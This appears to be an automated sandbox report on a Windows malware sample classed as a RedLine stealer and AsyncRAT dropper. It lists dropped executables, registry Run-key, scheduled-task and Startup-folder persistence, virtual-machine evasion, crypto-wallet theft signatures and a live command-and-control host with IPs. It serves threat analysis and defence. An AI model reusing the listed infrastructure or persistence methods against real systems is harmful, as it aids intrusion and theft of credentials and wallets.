Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1571409   Sample: f5ATZ1i5CU.exe   Start date: 09/12/2024   Architecture: WINDOWS   Score: 100

Hosts resolved during the run: duclog23.duckdns.org; ip-api.com; bg.microsoft.map.fastly.net
Signatures on the run as a whole: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures; Uses dynamic DNS services (duclog23.duckdns.org)

Process tree (started / dropped / network edges as drawn in the graph):

f5ATZ1i5CU.exe
  dropped: C:\Users\user\AppData\Roaming\Metin.exe (PE32); C:\Users\user\AppData\Roaming\M2.exe (PE32)
  signatures: Found many strings related to Crypto-Wallets (likely being stolen); Encrypted powershell cmdline option found; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  started:
    Metin.exe
      network: ip-api.com 208.95.112.1, ports 49711, 80 (TUT-ASUS United States)
      dropped: C:\Users\user\AppData\Roaming\Chrome.exe (PE32)
      signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 5 other signatures
      started: powershell.exe (Loading BitLocker PowerShell Module) -> conhost.exe; powershell.exe -> conhost.exe; powershell.exe -> conhost.exe; 2 other processes -> conhost.exe, conhost.exe
    M2.exe
      network: duclog23.duckdns.org 192.169.69.26, ports 37552, 49704, 49740 (WOWUS United States)
      signatures: Machine Learning detection for dropped file
      started: conhost.exe
    powershell.exe
      signatures: Found many strings related to Crypto-Wallets (likely being stolen); Loading BitLocker PowerShell Module
      started: conhost.exe
Chrome.exe (three instances, started from the graph root rather than by a tracked parent process)
  signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

                        SourceDetectionScannerLabelLink
                        f5ATZ1i5CU.exe79%ReversingLabsWin32.Ransomware.RedLine
                        f5ATZ1i5CU.exe100%AviraTR/Dropper.Gen
                        f5ATZ1i5CU.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\Metin.exe100%AviraHEUR/AGEN.1305769
                        C:\Users\user\AppData\Roaming\Chrome.exe100%AviraHEUR/AGEN.1305769
                        C:\Users\user\AppData\Roaming\M2.exe100%AviraHEUR/AGEN.1305500
                        C:\Users\user\AppData\Roaming\Metin.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\Chrome.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\M2.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\Chrome.exe96%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                        C:\Users\user\AppData\Roaming\M2.exe89%ReversingLabsByteCode-MSIL.Infostealer.RedLine
                        C:\Users\user\AppData\Roaming\Metin.exe96%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                        No Antivirus matches
                        No Antivirus matches
Antivirus detection (URLs and domains)
Source | Detection | Scanner | Label
http://duclog23.duckdns.org:37552 | 100% | Avira URL Cloud | malware
http://crl.mic | 0% | Avira URL Cloud | safe
http://www.microsoft.co$ | 0% | Avira URL Cloud | safe
duclog23.duckdns.org:37552 | 100% | Avira URL Cloud | malware
http://crl.m9 | 0% | Avira URL Cloud | safe
http://duclog23.duckdns.org:37552/ | 100% | Avira URL Cloud | malware
http://crl.micft.cMicRosof | 0% | Avira URL Cloud | safe
http://duclog23.duckdns.org | 100% | Avira URL Cloud | malware
duclog23.duckdns.org | 100% | Avira URL Cloud | malware
http://crl.m2 | 0% | Avira URL Cloud | safe
http://www.microsoft.cos | 0% | Avira URL Cloud | safe
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
duclog23.duckdns.org | 192.169.69.26 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | false | | high

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://duclog23.duckdns.org:37552/ | true | Avira URL Cloud: malware | unknown
duclog23.duckdns.org | true | Avira URL Cloud: malware | unknown
duclog23.duckdns.org:37552 | true | Avira URL Cloud: malware | unknown
http://ip-api.com/line/?fields=hosting | false | | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
192.169.69.26 | duclog23.duckdns.org | United States | 23033 | WOWUS | true
General Information
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1571409
Start date and time: 2024-12-09 11:03:55 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: f5ATZ1i5CU.exe (renamed because original name is a hash value)
Original Sample Name: fae4297f765a1c93fef48d7bddd8c88e6361dcb7eb9efc7cb10ff050e2157d80.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@27/26@3/2
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 36.4%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 150
                                                                                                              • Number of non-executed functions: 10
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 23.193.114.26, 23.193.114.11, 52.165.164.15
                                                                                                              • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target Chrome.exe, PID 5512 because it is empty
                                                                                                              • Execution Graph export aborted for target Chrome.exe, PID 7476 because it is empty
                                                                                                              • Execution Graph export aborted for target Chrome.exe, PID 8048 because it is empty
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 1452 because it is empty
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 2312 because it is empty
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 4456 because it is empty
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 8144 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                              • VT rate limit hit for: f5ATZ1i5CU.exe
Time      Type             Description
05:04:47  API Interceptor  93x Sleep call for process: powershell.exe modified
05:06:05  API Interceptor  45x Sleep call for process: Metin.exe modified
11:06:06  Task Scheduler   Run new task: Chrome  path: C:\Users\user\AppData\Roaming\Chrome.exe
11:06:06  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Roaming\Chrome.exe
11:06:14  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Roaming\Chrome.exe
11:06:22  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk
IPs
Match | Associated Sample Name / URL | Detection | Threat Name | Context

208.95.112.1
  R55-RFQ.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
  YXHoexbTFp.exe | malicious | PureLog Stealer, zgRAT | ip-api.com/json/
  file.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
  spoolsv.exe | malicious | RedLine, StormKitty, XWorm | ip-api.com/line/?fields=hosting
  2477.exe | malicious | NoCry, RedLine, StormKitty, XWorm | ip-api.com/line/?fields=hosting
  BA9qyj2c9G.exe | malicious | WhiteSnake Stealer | ip-api.com/line?fields=query,country
  xooSsYaHN0.exe | malicious | Go Stealer, Skuld Stealer | ip-api.com/json
  ea4LTmpMwl.exe | malicious | Discord Token Stealer, DotStealer | ip-api.com/json/
  file.exe | malicious | Amadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc | ip-api.com/json/
  file.exe | malicious | Discord Token Stealer, DotStealer | ip-api.com/json/

192.169.69.26
  SX8OLQP63C.exe | malicious | VjW0rm, AsyncRAT, RATDispenser | yuya0415.duckdns.org:1928/Vre
  confirmación y corrección de la dirección de entrega.vbs | malicious | Unknown | servidorarquivos.duckdns.org/e/e
  oKtkBYZMWl.exe | malicious | Unknown | csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
  oKtkBYZMWl.exe | malicious | Unknown | csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
  http://yvtplhuqem.duckdns.org/ja/ | malicious | Unknown | yvtplhuqem.duckdns.org/ja/
  http://fqqqffcydg.duckdns.org/en/ | malicious | Unknown | fqqqffcydg.duckdns.org/en/
  http://yugdzvsqnf.duckdns.org/en/ | malicious | Unknown | yugdzvsqnf.duckdns.org/en/
  &nuevo_pedido#..vbs | malicious | Unknown | servidorarquivos.duckdns.org/e/e
  transferencia_Hsbc.xlsx | malicious | Unknown | servidorarquivos.duckdns.org/e/e
  http://www.secure-0fflce-o365.duckdns.org/ | malicious | Unknown | www.secure-0fflce-o365.duckdns.org/
Domains
Match | Associated Sample Name / URL | Detection | Threat Name | Context

ip-api.com
  R55-RFQ.exe | malicious | AgentTesla | 208.95.112.1
  YXHoexbTFp.exe | malicious | PureLog Stealer, zgRAT | 208.95.112.1
  file.exe | malicious | Blank Grabber | 208.95.112.1
  spoolsv.exe | malicious | RedLine, StormKitty, XWorm | 208.95.112.1
  2477.exe | malicious | NoCry, RedLine, StormKitty, XWorm | 208.95.112.1
  BA9qyj2c9G.exe | malicious | WhiteSnake Stealer | 208.95.112.1
  xooSsYaHN0.exe | malicious | Go Stealer, Skuld Stealer | 208.95.112.1
  ea4LTmpMwl.exe | malicious | Discord Token Stealer, DotStealer | 208.95.112.1
  file.exe | malicious | Amadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc | 208.95.112.1
  file.exe | malicious | Discord Token Stealer, DotStealer | 208.95.112.1

duclog23.duckdns.org
  P7UN3WhDhK.exe | malicious | RedLine, StormKitty, XWorm | 154.216.20.204

bg.microsoft.map.fastly.net
  https://www.drvhub.net | malicious | Unknown | 199.232.210.172
  NhoqAfkhHL.bat | malicious | Unknown | 199.232.214.172
  TRANSFERENCIA COMPROBANTES.lnk | malicious | XenoRAT | 199.232.210.172
  file.exe | malicious | LummaC Stealer | 199.232.210.172
  file.exe | malicious | Quasar | 199.232.210.172
  file.exe | malicious | Quasar | 199.232.210.172
  file.exe | malicious | AveMaria, StormKitty, VenomRAT | 199.232.210.172
  Q6OOwHYZzH.exe | malicious | DCRat | 199.232.210.172
  List of required items pdf.vbs | malicious | GuLoader | 199.232.214.172
  List of required items.vbs | malicious | Unknown | 199.232.214.172
ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context

WOWUS
  P0J8k3LhVV.exe | malicious | Nanocore | 192.169.69.26
  173349055645d097cf36f6a7cc8cd8874001209539b453cb16f6acd61c0d845ab62e19e89d339.dat-decoded.exe | malicious | AsyncRAT | 192.169.69.26
  173349048648c854fdb460c6c7c5fd91e325ea882961d8aa5918c705b053bb8e9350ae27c8877.dat-decoded.exe | malicious | AsyncRAT | 192.169.69.26
  17334905521d597933f8aaddb97573b46d117b288a865f8a218fac0e15588edac3edcab35b588.dat-decoded.exe | malicious | AsyncRAT, PureLog Stealer | 192.169.69.26
  17334905555b1bb5616b6229d3e91468cd944baaeea0d1c904cc91a0fe89b683d653c3710f732.dat-decoded.exe | malicious | AsyncRAT, DcRat | 192.169.69.26
  17334792691d3587abc182d697c2a82dd4ad88afaea9fc5290ea9e42c7eec649b5ab319fda603.dat-decoded.exe | malicious | AsyncRAT | 192.169.69.26
  mgtOKjHZ1s.exe | malicious | Remcos | 192.169.69.26
  clfCnDEDd1.exe | malicious | Remcos | 192.169.69.26
  H1WNju5cCI.dll | malicious | Remcos | 192.169.69.26
  tLC32F63bR.dll | malicious | Remcos | 192.169.69.26

TUT-ASUS
  R55-RFQ.exe | malicious | AgentTesla | 208.95.112.1
  YXHoexbTFp.exe | malicious | PureLog Stealer, zgRAT | 208.95.112.1
  file.exe | malicious | Blank Grabber | 208.95.112.1
  spoolsv.exe | malicious | RedLine, StormKitty, XWorm | 208.95.112.1
  2477.exe | malicious | NoCry, RedLine, StormKitty, XWorm | 208.95.112.1
  BA9qyj2c9G.exe | malicious | WhiteSnake Stealer | 208.95.112.1
  xooSsYaHN0.exe | malicious | Go Stealer, Skuld Stealer | 208.95.112.1
  ea4LTmpMwl.exe | malicious | Discord Token Stealer, DotStealer | 208.95.112.1
  file.exe | malicious | Amadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc | 208.95.112.1
  file.exe | malicious | Discord Token Stealer, DotStealer | 208.95.112.1
No context

Dropped Files
Match | Associated Sample Name / URL | Detection | Threat Name

C:\Users\user\AppData\Roaming\M2.exe
  P7UN3WhDhK.exe | malicious | RedLine, StormKitty, XWorm

C:\Users\user\AppData\Roaming\Chrome.exe
  P7UN3WhDhK.exe | malicious | RedLine, StormKitty, XWorm
Process: C:\Users\user\AppData\Roaming\Chrome.exe
File Type: CSV text
Category: dropped
Size (bytes): 654
Entropy (8bit): 5.380476433908377
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5: 30E4BDFC34907D0E4D11152CAEBE27FA
SHA1: 825402D6B151041BA01C5117387228EC9B7168BF
SHA-256: A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512: 89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
